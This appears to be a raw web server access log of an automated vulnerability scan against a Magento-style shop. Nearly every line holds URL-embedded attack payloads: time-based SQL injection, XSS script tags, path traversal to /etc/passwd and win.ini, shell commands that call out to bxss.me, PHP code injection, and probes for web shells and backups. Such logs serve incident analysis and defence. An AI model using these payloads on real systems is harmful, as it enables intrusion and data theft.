/echo%20fndmhx$()\\%20htgzta\\nz^xyu||a%20%23'%20&echo%20fndmhx$()\\%20htgzta\\nz^xyu||a%20%23|\"%20&echo%20fndmhx$()\\%20htgzta\\nz^xyu||a%20%23/skin/install/default/default/css/reset.css 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/ 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/skin/frontend/ 1 https://104.36.149.61/
/cgi-sys/entropybanner.cgi 1 ()%20{%20Referer
/'\"()&%25<acx><ScRiPt%20>xIbD(9533)<%2fScRiPt>/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/uploader/ 1 -
/vpn/index.html 2 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc/skin/adminhtml/default'\"()&%25<acx><ScRiPt%20>gumy(9732)<%2fScRiPt>/ 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/prototype/debug.js 1 https://104.36.149.61/
/(nslookup%20hitpipqpuszlj742d9.bxss.me||perl%20-e%20\"gethostbyname('hitpipqpuszlj742d9.bxss.me')\")/js/prototype/validation.js 1 -
/..%2facc/js/scriptaculous/effects.js 1 https://104.36.149.61/
/bxss.me/js/prototype/ 1 https://104.36.149.61/
/authenticationendpoint/megas.jsp 1 -
/104-backup.tar.gz 1 -
/acc/js/'\"()&%25<acx><ScRiPt%20>JN5X(9938)<%2fScRiPt>/windows/ 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(107).concat(80).concat(117).concat(76)+(require\"socket\"%0aSocket.gethostbyname(\"hitiz\"+\"ueuktxrz27d8f.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/uploader/ 1 -
/acc/.%2fskin/frontend/ 1 https://104.36.149.61/
//%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/windows/win.ini 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc/skin/install/default/default/css/12345'\"\\'\\\") 1 https://104.36.149.61/
/acc/index.php/install/wizard//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/browser.js 1 https://104.36.149.61/
/acc/js/%3b(nslookup%20hitmjvvbtnsck30639.bxss.me||perl%20-e%20\"gethostbyname('hitmjvvbtnsck30639.bxss.me')\")|(nslookup%20hitmjvvbtnsck30639.bxss.me||perl%20-e%20\"gethostbyname('hitmjvvbtnsck30639.bxss.me')\")&(nslookup%20hitmjvvbtnsck30639.bxss.me||per 1 -
/response.write(9994247*9896308)/js/mage/adminhtml/events.js 1 -
/admin/tinymce 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/js/1%00%c0%a7%c0%a2%252527%252522/prototype.js 1 https://104.36.149.61/
/acc/..%2fjs/prototype/debug.js 1 https://104.36.149.61/
/acc/index.php/install/../../../package-lock.json 1 -
/invoker/JMXInvokerServlet 1 -
/acc/skin/bxss.me%2ft%2fxss.html%3f%2500/default/default/css/iestyles.css 1 -
/cgi-bin/composer.json 1 -
/scripts/history/historyFrame.html 1 -
/backup-104.sql.tar 1 -
/mysql/main.php 1 -
/acc/js/prototype/windows/themes/./WEB-INF/web.xml%00.jsp 2 -
/acc/index.php/install/wizard/locale/../../../../../web.config 1 -
/'.print(md5(31337)).'/js/varien/form.js 1 -
/isadmin.htm 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"geb0\"=\"geb0/js/prototype/prototype.js 1 https://104.36.149.61/
/acc/js/scriptaculous/..%2feffects.js 1 https://104.36.149.61/
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/events.js 1 https://104.36.149.61/
/${9999323+9999683}/js/mage/adminhtml/backup.js 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/ 1 -
/${9999629+9999431}/js/varien/js.js 1 -
/acc/skin/install/default/default/bxss.me%2ft%2fxss.html%3f%2500/ie7minus.css 1 -
/acc/skin/install/default/default/css/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500.css 1 -
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/1'\"/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>mxOU(9776)<%2fScRiPt>/js/scriptaculous/effects.js 1 https://104.36.149.61/
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fshells%23foo/development 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(116).concat(67).concat(113).concat(82)+(require\"socket\"%0aSocket.gethostbyname(\"hittp\"+\"gjeychky4a6ce.bxss.me.\")[3].to_s)+\"/js/prototype/windows/ 1 -
/aQtyp2Q5')%20OR%20992=(SELECT%20992%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/prototype/tooltip.js 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/index.php/install/wizard/locale/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"KI5V\"=\"KI5V/js/prototype/validation.js 1 https://104.36.149.61/
//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd 2 -
/'.gethostbyname(lc('hitgu'.'jwqwtetn93c56.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(90).chr(110).chr(90).'/js/mage/adminhtml/product/ 1 -
/..%2facc/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/Account/Register.aspx 1 -
/cgi-bin/php4 1 -
/\".gethostbyname(lc(\"hitja\".\"bofupwov85072.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(106).chr(72).chr(108).chr(82).\"/skin/adminhtml/ 1 -
/javascript/tiny_mce 1 -
/acc/js/mage/%3b(nslookup%20hitdlbamyfdtx95c85.bxss.me||perl%20-e%20\"gethostbyname('hitdlbamyfdtx95c85.bxss.me')\")|(nslookup%20hitdlbamyfdtx95c85.bxss.me||perl%20-e%20\"gethostbyname('hitdlbamyfdtx95c85.bxss.me')\")&(nslookup%20hitdlbamyfdtx95c85.bxss.me 1 -
/acc/%2fxfs.bxss.me/adminhtml/default/ 1 -
/$(nslookup%20hitimhfyzrgre18709.bxss.me||perl%20-e%20\"gethostbyname('hitimhfyzrgre18709.bxss.me')\")/js/prototype/debug.js 1 -
/acc/index.php/install/wizard//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 2 -
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/translate.js 1 -
/zabbix/ 1 -
/acc/index.php/install/wizard/config//........................................................................../../../../../../../../etc/passwd 1 -
/(nslookup%20hitwhaoltonlq3c79d.bxss.me||perl%20-e%20\"gethostbyname('hitwhaoltonlq3c79d.bxss.me')\")/js/mage/adminhtml/uploader/ 1 -
/%3b(nslookup%20hitahagsuzhaz60f8a.bxss.me||perl%20-e%20\"gethostbyname('hitahagsuzhaz60f8a.bxss.me')\")|(nslookup%20hitahagsuzhaz60f8a.bxss.me||perl%20-e%20\"gethostbyname('hitahagsuzhaz60f8a.bxss.me')\")&(nslookup%20hitahagsuzhaz60f8a.bxss.me||perl%20-e% 1 -
/tinymce 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/giftmessage.js 1 -
/if(now()=sysdate(),sleep(15),0)/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/skin/install/1%00%c0%a7%c0%a2%252527%252522/default/ 1 https://104.36.149.61/
/acc/js/..%2fmage/adminhtml/grid.js 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(115).concat(84).concat(115).concat(86)+(require\"socket\"%0aSocket.gethostbyname(\"hittu\"+\"vmccderr81b68.bxss.me.\")[3].to_s)+\"/skin/install/default/default/css/clears.css 1 -
/<!--/js/mage/translate.js 1 -
/\".gethostbyname(lc(\"hitdf\".\"iiemdzbmc03d1.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(105).chr(80).chr(108).chr(70).\"/js/mage/adminhtml/backup.js 1 -
/bxss.me/js/prototype/windows/ 1 https://104.36.149.61/
/acc/index.php/install//../../../WEB-INF/web.xml%C0%80.jsp 1 -
/axis2/axis2-admin/ 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/accordion.js 1 -
/104.rar 1 -
/'+response.write(9177626*9035729)+'/js/mage/adminhtml/hash.js 1 -
/acc/js/mage'\"()&%25<acx><ScRiPt%20>QEM2(9190)<%2fScRiPt>/adminhtml/form.js 1 https://104.36.149.61/
/../../../../Gemfile 1 -
/)/js/mage/ 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'QkPn'='QkPn/js/mage/translate.js 1 https://104.36.149.61/
/acc/.%2fskin/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc/index.php/install/wizard/config//../../../../../../../../boot.ini 1 -
/'.print(md5(31337)).'/js/prototype/tooltip_manager.js 1 -
/&echo%20lmdtrm$()\\%20ikjjqs\\nz^xyu||a%20%23'%20&echo%20lmdtrm$()\\%20ikjjqs\\nz^xyu||a%20%23|\"%20&echo%20lmdtrm$()\\%20ikjjqs\\nz^xyu||a%20%23/js/mage/adminhtml/backup.js 1 -
/pcGiAkRm/js/prototype/windows/ 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/skin/install/default/default/css/iestyles.css 1 -
/1%20waitfor%20delay%20'0:0:15'%20--%20/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/varien/js.js 1 -
/..%2facc/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml/accordion<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>.js 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/js/prototype/extended_debug.js 1 https://104.36.149.61/
/acc/index.php/install//../../../../../../../../windows/win.ini%00 1 -
/'+response.write(9975357*9127767)+'/skin/adminhtml/default/ 1 -
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/hash.js 1 -
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/default/default/css/ie7minus.css 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/config//../../../../../../../../windows/win.ini%00en 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"nvoL\"=\"nvoL/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/skin/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/default/default/css/reset.css 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/prototype/extended_debug.js 1 -
/currentsetting.htm 1 -
/&echo%20zfjtkf$()\\%20accfjv\\nz^xyu||a%20%23'%20&echo%20zfjtkf$()\\%20accfjv\\nz^xyu||a%20%23|\"%20&echo%20zfjtkf$()\\%20accfjv\\nz^xyu||a%20%23/skin/install/default/default/css/reset.css 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/prototype/extended_debug.js 1 https://104.36.149.61/
/\".gethostbyname(lc(\"hitlh\".\"dcsissqo633ad.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(97).chr(82).chr(109).chr(67).\"/js/mage/adminhtml/ 1 -
/acc/index.php/install/wizard/beginPost/..%2fpackage-lock.json 1 -
/\".gethostbyname(lc(\"hithf\".\"jsuxoxgp4965b.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(122).chr(82).chr(106).chr(84).\"/index.php/install/wizard/config/ 1 -
/acc9576756/skin/adminhtml/default/ 1 https://104.36.149.61/
/.deployignore 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'4sw8'!='4sw8%25/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
//../../../../../../../../windows/win.ini%C0%80.jsp 1 -
/acc/index.php/install/wizard/locale//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini 1 -
/m8tiWunz'%20OR%20347=(SELECT%20347%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/'.gethostbyname(lc('hitkx'.'cfyurida1b5ff.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(78).chr(115).chr(90).'/skin/install/default/default/css/iestyles.css 1 -
/.pydevproject 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/varien/js.js 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/giftoptions/ 1 -
/1some_inexistent_file_with_long_name%00.jpg/skin/adminhtml/default/ 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>8tiP(9747)<%2fScRiPt>/skin/frontend/ 1 https://104.36.149.61/
//%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows/win.ini 1 -
/acc/skin/install<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/default/default/css/clears.css 1 -
/^(%23$!@%23$)(()))******/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/js/mage/%3b(nslookup%20hitdfhuaeuqhpbb00d.bxss.me||perl%20-e%20\"gethostbyname('hitdfhuaeuqhpbb00d.bxss.me')\")|(nslookup%20hitdfhuaeuqhpbb00d.bxss.me||perl%20-e%20\"gethostbyname('hitdfhuaeuqhpbb00d.bxss.me')\")&(nslookup%20hitdfhuaeuqhpbb00d.bxss.me 1 -
/acc/skin/install/default/default'\"()&%25<acx><ScRiPt%20>dgnk(9584)<%2fScRiPt>/css/iestyles.css 1 https://104.36.149.61/
/acc/js/mage/adminhtml/..%2fgiftoptions/ 1 https://104.36.149.61/
/52dFwTSr'%20OR%20801=(SELECT%20801%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/prototype/windows/ 1 https://104.36.149.61/
/c99.php 1 -
/acc/js/.%2fmage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/hash.js 1 -
/acc/index.php/install/wizard//../../../../../../../../windows/win.ini%00 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/ 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/browser.js 1 -
/ioncube/loader-wizard.php 1 -
//..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd 1 -
/autodiscover/autodiscover.json 13 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/index.php/install/..%2f..%2f..%2fweb.config 1 -
/acc/index.php//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 2 -
/!(()&&!|*|*|/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2fpackage.json 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/translate.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/mage/adminhtml/flexuploader.js 1 -
/<!--/skin/install/default/default/css/reset.css 1 -
/1some_inexistent_file_with_long_name%00.jpg/skin/install/default/default/ 1 https://104.36.149.61/
/%2fxfs.bxss.me/js/mage/adminhtml/wysiwyg/ 1 -
/'\"/js/mage/adminhtml/hash.js 1 -
/'\"()&%25<acx><ScRiPt%20>sGFI(9077)<%2fScRiPt>/js/prototype/tooltip.js 1 https://104.36.149.61/
/\"+response.write(9612660*9888266)+\"/skin/frontend/ 1 -
/go/add-on/business-continuity/api/cruise_config 1 -
/^(%23$!@%23$)(()))******/skin/install/default/ 1 https://104.36.149.61/
/mYdzvFpo'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/wysiwyg/ 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/acc/%3b(nslookup%20hityylfcuetyt35178.bxss.me||perl%20-e%20\"gethostbyname('hityylfcuetyt35178.bxss.me')\")|(nslookup%20hityylfcuetyt35178.bxss.me||perl%20-e%20\"gethostbyname('hityylfcuetyt35178.bxss.me')\")&(nslookup%20hityylfcuetyt35178.bxss.me||perl%2 1 -
/%3b(nslookup%20hitynnofmpxlwfc768.bxss.me||perl%20-e%20\"gethostbyname('hitynnofmpxlwfc768.bxss.me')\")|(nslookup%20hitynnofmpxlwfc768.bxss.me||perl%20-e%20\"gethostbyname('hitynnofmpxlwfc768.bxss.me')\")&(nslookup%20hitynnofmpxlwfc768.bxss.me||perl%20-e% 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>gJZT(9895)<%2fScRiPt>/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/skin/adminhtml'\"()&%25<acx><ScRiPt%20>PQf4(9284)<%2fScRiPt>/ 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'4tWm'!='4tWm%25/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/prototype/windows/themes/ 1 -
/wp-admin/admin-ajax.php 2 -
/acc/js/prototype'\"()&%25<acx><ScRiPt%20>fBHE(9135)<%2fScRiPt>/extended_debug.js 1 https://104.36.149.61/
/acc/js/.%2fprototype/windows/ 1 https://104.36.149.61/
/%3b(nslookup%20hitvwrnmvvkov81a2b.bxss.me||perl%20-e%20\"gethostbyname('hitvwrnmvvkov81a2b.bxss.me')\")|(nslookup%20hitvwrnmvvkov81a2b.bxss.me||perl%20-e%20\"gethostbyname('hitvwrnmvvkov81a2b.bxss.me')\")&(nslookup%20hitvwrnmvvkov81a2b.bxss.me||perl%20-e% 1 -
/app/config/database.yml.sqlite3 1 -
/../../../../../../../../z/../../../../../../../../../etc/shells 1 -
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/uploader/ 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/giftoptions/ 1 -
/r57eng.php 1 -
/acc//mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/skin/install/default/ 1 https://104.36.149.61/
/'\"/js/varien/form.js 1 -
/acc/index.php/install/wizard/config//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd 1 -
/acc/js/%3b(nslookup%20hitqkueueyaad74ef3.bxss.me||perl%20-e%20\"gethostbyname('hitqkueueyaad74ef3.bxss.me')\")|(nslookup%20hitqkueueyaad74ef3.bxss.me||perl%20-e%20\"gethostbyname('hitqkueueyaad74ef3.bxss.me')\")&(nslookup%20hitqkueueyaad74ef3.bxss.me||per 1 -
/-1%20OR%202+978-978-1=0+0+0+1/js/prototype/windows/ 1 https://104.36.149.61/
/\"+response.write(9347243*9984767)+\"/js/prototype/extended_debug.js 1 -
/\".gethostbyname(lc(\"hitxk\".\"teisdlpla79d8.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(105).chr(66).chr(97).chr(88).\"/js/prototype/debug.js 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/prototype/windows/themes/ 1 -
/acc/skin/install/default/default/.%2fcss/clears.css 1 https://104.36.149.61/
/%3b(nslookup%20hitndrzjmpeta91bca.bxss.me||perl%20-e%20\"gethostbyname('hitndrzjmpeta91bca.bxss.me')\")|(nslookup%20hitndrzjmpeta91bca.bxss.me||perl%20-e%20\"gethostbyname('hitndrzjmpeta91bca.bxss.me')\")&(nslookup%20hitndrzjmpeta91bca.bxss.me||perl%20-e% 1 -
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>JGJG(9452)<%2fScRiPt>/flexuploader.js 1 https://104.36.149.61/
/acc/js/mage'\"()&%25<acx><ScRiPt%20>JVyg(9493)<%2fScRiPt>/adminhtml/backup.js 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>JN5X(9762)<%2fScRiPt>/prototype/windows/ 1 https://104.36.149.61/
/acc/js/..%2fmage/adminhtml/sales/ 1 https://104.36.149.61/
/app/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/shells 1 -
/65TX2l8g')%20OR%20929=(SELECT%20929%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/ 1 https://104.36.149.61/
/%3b(nslookup%20hitjpipyzictda4698.bxss.me||perl%20-e%20\"gethostbyname('hitjpipyzictda4698.bxss.me')\")|(nslookup%20hitjpipyzictda4698.bxss.me||perl%20-e%20\"gethostbyname('hitjpipyzictda4698.bxss.me')\")&(nslookup%20hitjpipyzictda4698.bxss.me||perl%20-e% 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/skin/install/default/default/ 1 -
/acc/index.php/install/bxss.me%2ft%2fxss.html%3f%2500/config/ 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/skin/frontend/ 1 https://104.36.149.61/
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo 2 -
/acc/skin/install/.%2fdefault/default/ 1 https://104.36.149.61/
/<!--/index.php/install/ 1 -
/acc/%3b(nslookup%20hitxwahyvafxudca97.bxss.me||perl%20-e%20\"gethostbyname('hitxwahyvafxudca97.bxss.me')\")|(nslookup%20hitxwahyvafxudca97.bxss.me||perl%20-e%20\"gethostbyname('hitxwahyvafxudca97.bxss.me')\")&(nslookup%20hitxwahyvafxudca97.bxss.me||perl%2 1 -
/acc/js/mage/adminhtml/browser.js/902750%40 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/104.36.149.61_db.tar.gz 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/..%2fjs/mage/adminhtml/hash.js 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/prototype/windows/themes/ 1 https://104.36.149.61/
/WEB-INF/jboss-web.xml_ 1 -
/acc/index.php/install/wizard/config//../../../../../../../../etc/passwd%00en 1 -
/.%2facc/skin/frontend/ 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/install/default/default/css/iestyles.css 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/prototype/extended_debug.js 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/giftmessage.js 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/scriptaculous/effects.js 1 -
/acc/js/mage/adminhtml/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f.js 1 https://104.36.149.61/
/%2fxfs.bxss.me/skin/install/default/ 1 -
/!(()&&!|*|*|/js/varien/form.js 1 https://104.36.149.61/
/acc/index.php//../../../../../../../../etc/passwd%C0%80.jsp 1 -
/%3b(nslookup%20hitimmsmnifoz6c442.bxss.me||perl%20-e%20\"gethostbyname('hitimmsmnifoz6c442.bxss.me')\")|(nslookup%20hitimmsmnifoz6c442.bxss.me||perl%20-e%20\"gethostbyname('hitimmsmnifoz6c442.bxss.me')\")&(nslookup%20hitimmsmnifoz6c442.bxss.me||perl%20-e% 1 -
/%3b(nslookup%20hittkdoyvwshm3698b.bxss.me||perl%20-e%20\"gethostbyname('hittkdoyvwshm3698b.bxss.me')\")|(nslookup%20hittkdoyvwshm3698b.bxss.me||perl%20-e%20\"gethostbyname('hittkdoyvwshm3698b.bxss.me')\")&(nslookup%20hittkdoyvwshm3698b.bxss.me||perl%20-e% 1 -
/nst.php 1 -
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/form.js 1 -
/@@aUO9a/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/long_inexistent_path12345_/Null.htw 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/wysiwyg/ 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/prototype/ 1 -
/1'\"/js/mage/translate.js 1 https://104.36.149.61/
/.git/config 19 -
/acc/skin<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/install/default/default/css/clears.css 1 -
/acc/js/'\"()&%25<acx><ScRiPt%20>Rirk(9384)<%2fScRiPt>/js.js 1 https://104.36.149.61/
/'+response.write(9567693*9061005)+'/skin/install/default/default/css/clears.css 1 -
/adminer-4.4.0-mysql.php 1 https://104.36.149.61/
/acc/js/1some_inexistent_file_with_long_name%00.jpg/debug.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/varien/form.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>mwZT(9772)<%2fScRiPt>/wysiwyg/ 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/Vagrantfile 1 -
/acc/js/varien/%3b(nslookup%20hitlmdmoitijo67a86.bxss.me||perl%20-e%20\"gethostbyname('hitlmdmoitijo67a86.bxss.me')\")|(nslookup%20hitlmdmoitijo67a86.bxss.me||perl%20-e%20\"gethostbyname('hitlmdmoitijo67a86.bxss.me')\")&(nslookup%20hitlmdmoitijo67a86.bxss. 1 -
/)/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
